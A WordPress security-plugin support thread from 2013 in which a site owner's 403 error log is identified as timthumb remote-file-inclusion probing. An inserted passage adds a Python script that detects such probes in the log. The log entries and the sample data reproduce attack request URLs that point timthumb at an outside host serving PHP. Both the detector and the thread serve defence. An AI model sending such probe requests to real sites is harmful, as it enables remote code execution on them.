Timthumb 403 errors – Timthumb hacking attempt


  • #5261
    WugFresh
    Participant

    This is the error log I have now, I am guessing it's timthumb related.  I have updated all my timthumbs with the latest version available, I have tried whitelisting the plugins with regex wild card notation, nothing seems to work for me.  Any other suggestions?:

    http://pastebin.com/raw.php?i=RqDKrQqz
    BPS PRO SECURITY / HTTP ERROR LOG
    =================================
    =================================

    >>>>>>>>>>> 403 GET or Other Request Error Logged - May 2, 2013 - 10:41 am <<<<<<<<<<<
    REMOTE_ADDR: 92.60.240.218
    Host Name: 218-240-60-90.packetexchange.net
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR: 92.60.240.218
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-content/themes/responsive-child-theme//helpers/timthumb/image.php?src=http://flickr.com.finnovations.de/parola.php
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
    
    >>>>>>>>>>> 403 GET or Other Request Error Logged - May 2, 2013 - 10:41 am <<<<<<<<<<<
    REMOTE_ADDR: 92.60.240.218
    Host Name: 218-240-60-90.packetexchange.net
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR: 92.60.240.218
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-content/plugins/arconix-faq//timthumb.php?src=http://flickr.com.finnovations.de/parola.php
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
    #5262
    WugFresh
    Participant
    #5273
    AITpro Admin
    Keymaster

    This is a classic timthumb RFI hacking attempt against your website.  BPS Pro is blocking this hacking attempt against your website.

    /wp-content/themes/responsive-child-theme//helpers/timthumb/image.php?src=http://flickr.com.finnovations.de/parola.php
    /wp-content/plugins/arconix-faq//timthumb.php?src=http://flickr.com.finnovations.de/parola.php
    /wp-content/plugins/radykal-fancy-gallery//js/timthumb.php?src=http://flickr.com.finnovations.de/parola.php

    Unless of course you recognize the parola.php file and this is something that you want to be happening, which I doubt very seriously because the file would be an image file and not a php file.  Example:  imageFile.jpg and not .php.  The hacker is randomly sending timthumb RFI hacking probes at your site looking for a timthumb.php file to exploit and hack your website with.
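
The probes above all share one shape: a request to a `timthumb.php` (or `timthumb/image.php`) path whose `src=` parameter points at a host that merely *begins* with a trusted image domain (`flickr.com.<someone-else's-domain>`). The following script is an added example, not code from BPS, timthumb or either poster: it parses entries in the BPS HTTP error log format shown in this thread, pulls the `src` host out of each timthumb request, and flags it as an RFI probe unless the host really is a trusted domain or a subdomain of one. The log entries are constructed (documentation IP addresses and an `.example` host standing in for the attacker's), and the `ALLOWED_HOSTS` list is an assumption, not timthumb's actual configuration. The naive substring check is included only to show why a host of that shape was chosen by the attacker; the label-boundary check beside it is the correct one.

```python
"""Flag timthumb RFI probes in a BulletProof Security (BPS) 403 error log.

Added example (not BPS or timthumb code). The log text, IP addresses and
the attacker host are constructed; ALLOWED_HOSTS is an assumed allowlist.
"""
import re
from urllib.parse import parse_qs, urlparse

# Constructed sample in the BPS "HTTP ERROR LOG" layout seen in the thread:
# one spoofed-host probe, one legitimate flickr fetch, one unrelated 403.
SAMPLE_LOG = """\
>>>>>>>>>>> 403 GET or Other Request Error Logged - May 2, 2013 - 10:41 am <<<<<<<<<<<
REMOTE_ADDR: 198.51.100.7
REQUEST_METHOD: GET
REQUEST_URI: /wp-content/plugins/arconix-faq//timthumb.php?src=http://flickr.com.attacker.example/parola.php
HTTP_USER_AGENT: Mozilla/4.0 (compatible; MSIE 6.0)

>>>>>>>>>>> 403 GET or Other Request Error Logged - May 2, 2013 - 10:42 am <<<<<<<<<<<
REMOTE_ADDR: 198.51.100.8
REQUEST_METHOD: GET
REQUEST_URI: /wp-content/themes/child//helpers/timthumb/image.php?src=http://farm1.static.flickr.com/1/photo.jpg
HTTP_USER_AGENT: Mozilla/5.0

>>>>>>>>>>> 403 GET or Other Request Error Logged - May 2, 2013 - 10:43 am <<<<<<<<<<<
REMOTE_ADDR: 198.51.100.9
REQUEST_METHOD: GET
REQUEST_URI: /wp-admin/admin-ajax.php?action=heartbeat
HTTP_USER_AGENT: Mozilla/5.0
"""

ALLOWED_HOSTS = ("flickr.com", "picasa.com", "img.youtube.com")  # assumed allowlist
TIMTHUMB_PATH = re.compile(r"(?:/timthumb\.php|/timthumb/image\.php)$", re.I)
HEADER = re.compile(r"^>{3,}\s*(?P<status>\d{3}) .*? Logged - (?P<when>.+?) <{3,}$")


def parse_bps_log(text):
    """Split the log into entries: one dict of FIELD -> value per '>>>' header.
    STATUS and LOGGED are taken from the header line itself."""
    entries, current = [], None
    for line in text.splitlines():
        m = HEADER.match(line.strip())
        if m:
            current = {"STATUS": m.group("status"), "LOGGED": m.group("when")}
            entries.append(current)
            continue
        if current is None or ":" not in line:
            continue
        key, _, val = line.partition(":")  # first ':' only; URLs keep theirs
        current[key.strip()] = val.strip()
    return entries


def host_allowed(host, allowed=ALLOWED_HOSTS):
    """Correct check: exact match or a subdomain on a label boundary, so
    'flickr.com.attacker.example' and 'notflickr.com' are both rejected."""
    host = host.lower().rstrip(".")
    return any(host == a or host.endswith("." + a) for a in allowed)


def host_allowed_naive(host, allowed=ALLOWED_HOSTS):
    """Substring check of the kind old timthumb releases were known for: any
    host that merely contains a trusted domain passes, which is exactly what
    a probe host of the form flickr.com.<other-domain> is built to exploit."""
    return any(a in host.lower() for a in allowed)


def src_host(entry):
    """Hostname of the src= parameter of a timthumb request, or '' if the
    request is not for a timthumb script or src is local/relative."""
    parsed = urlparse(entry.get("REQUEST_URI", ""))
    if not TIMTHUMB_PATH.search(parsed.path):
        return ""
    src = parse_qs(parsed.query).get("src", [""])[0]
    return (urlparse(src).hostname or "").lower()


def classify(entry):
    """'timthumb-rfi', 'timthumb-allowed', 'timthumb-local' or 'other'."""
    parsed = urlparse(entry.get("REQUEST_URI", ""))
    if not TIMTHUMB_PATH.search(parsed.path):
        return "other"
    host = src_host(entry)
    if not host:
        return "timthumb-local"
    return "timthumb-allowed" if host_allowed(host) else "timthumb-rfi"


def rfi_probes(text):
    """(REMOTE_ADDR, src host) for every entry classified as an RFI probe."""
    return [(e.get("REMOTE_ADDR", ""), src_host(e))
            for e in parse_bps_log(text) if classify(e) == "timthumb-rfi"]


if __name__ == "__main__":
    for e in parse_bps_log(SAMPLE_LOG):
        print(e["LOGGED"], e.get("REMOTE_ADDR"), classify(e), src_host(e) or "-")
    print("RFI probes:", rfi_probes(SAMPLE_LOG))
```

Run against a real BPS log the script lists which remote addresses sent probes and which trusted domain was being impersonated; as the reply below notes, the addresses themselves are of little use for blocking, but the `src` hosts and the timthumb paths being probed tell you which theme and plugin copies of timthumb to verify are up to date or removed.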

    #5282
    WugFresh
    Participant

    Ahh.. Thank you. Yeah, that is definitely not intentional.  I do not recognize that parola.php.  I just downloaded it now to check it out and opened it in notepad++ and it looks very suspicious.

    I really appreciate your quick response.

    Now, moving forward.. since I only recently updated to BPS pro, how can I confirm this hack wasn’t already attempted against me when I was vulnerable?  I guess I should read up on RFI hacking, but I was wondering if you could steer me in the right direction to determine if some aspect of my site has already been compromised.

    Also, should I do anything else to mitigate these attacks?  Should I be blocking one of the ip addresses listed?

    Thanks again for your help.  Please let me know if I am being unclear about anything, or if more information would be helpful.


    -Wug

    #5287
    AITpro Admin
    Keymaster

    Please do not change the Topic tags after I have changed them to a more appropriate tag.  Thank you.

    If you were using BPS Free previously then you have nothing to worry about.  BPS Free has the same timthumb RFI Security filter as Pro.  If you did not have BPS Free installed then you can go to the Sucuri website and scan your site.  If your site was hacked you would probably know it was hacked so most likely your site is fine.

    You cannot really trust IP addresses period.  Surface level tools to track hackers or check IP addresses typically do not find the true base IP.

    Blocking by IP Address is a waste of time.  If you block 1 IP Address the hacker will switch to another one.  99.99% of hacking is done with automated bot programs.  They are designed to automatically switch to another IP address if an ip address is blocked.

    In the recent WordPress and Joomla attacks there were over 90,000 IP addresses being used.

    #5296
    WugFresh
    Participant

    Thank you. Sorry about the tags, that was unintentional.  I just updated the OP with a few entries from the security log since the pastebin I posted is set to expire.  Maybe this thread will be helpful to someone else who is experiencing a similar RFI hacking attempt.

    Thanks again for your quick correspondence.  BPS provides an excellent service and product.  Cheers.


    -Wug

    #5299
    AITpro Admin
    Keymaster

    Yep, no problem.  We were both posting at the same time.  😉  We want to keep tags in the Forum as relative as possible so that search results do not return all kinds of unrelated topics, which ends up making things hard to find and defeats the whole purpose.  😉  Thanks.
